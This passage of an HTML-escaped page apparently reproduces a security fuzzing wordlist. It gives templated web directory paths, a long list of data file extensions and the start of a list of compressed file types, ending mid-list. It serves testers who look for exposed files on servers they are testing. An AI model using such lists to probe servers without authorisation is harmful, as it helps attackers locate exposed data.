{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
